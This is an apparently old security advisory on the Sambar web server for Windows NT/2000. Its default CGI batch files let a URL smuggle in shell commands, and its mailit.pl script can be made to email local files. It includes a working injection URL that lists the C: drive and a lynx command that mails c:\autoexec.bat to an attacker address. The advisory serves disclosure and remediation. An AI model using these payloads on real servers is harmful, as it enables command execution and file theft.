Vulnerability

    Sambar

Affected

    WinNT, 2000

Description

    Georgi Chorbadzhiyski found  following.  The  default installation
    of Sambar server, put  into server's /CGI-BIN/ directory  two .BAT
    files - ECHO.BAT and HELLO.BAT.  These are simple files with  just
    one "echo" command in them.  However under Windows NT these  files
    can cause a  lot of trouble.   The problem IMHO  lays in  CMD.EXE,
    the example follows:

        http://yourdomain/cgi-bin/hello.bat?&dir+c:\

    You'll see a nice  listing of your C:  drive.  Sambar server  runs
    with Administrator privileges  under NT so  even if you  use NTFS,
    you still will  be affected.   This bug was  discovered by Georich
    Chorbadzhiyski and Nikolay Tsvetkov.

    This is  not the  only problem  with default  CGI's included  with
    sambar 4.2.  Try this:

        echo 'server=smtp.example.com&from=root@example.com&recipient=evil@evil.org&subject=Hi&body=Hello+World%0A&attach=c:\autoexec.bat' | lynx -post_data http://sambar.example.com/cgi-bin/mailit.pl

Solution

    Sambar  server  running  on  Windows  95/98  is  _NOT_ vulnerable.
    As a solution delete any .BAT files in /CGI-BIN/ directory of your
    Sambar server.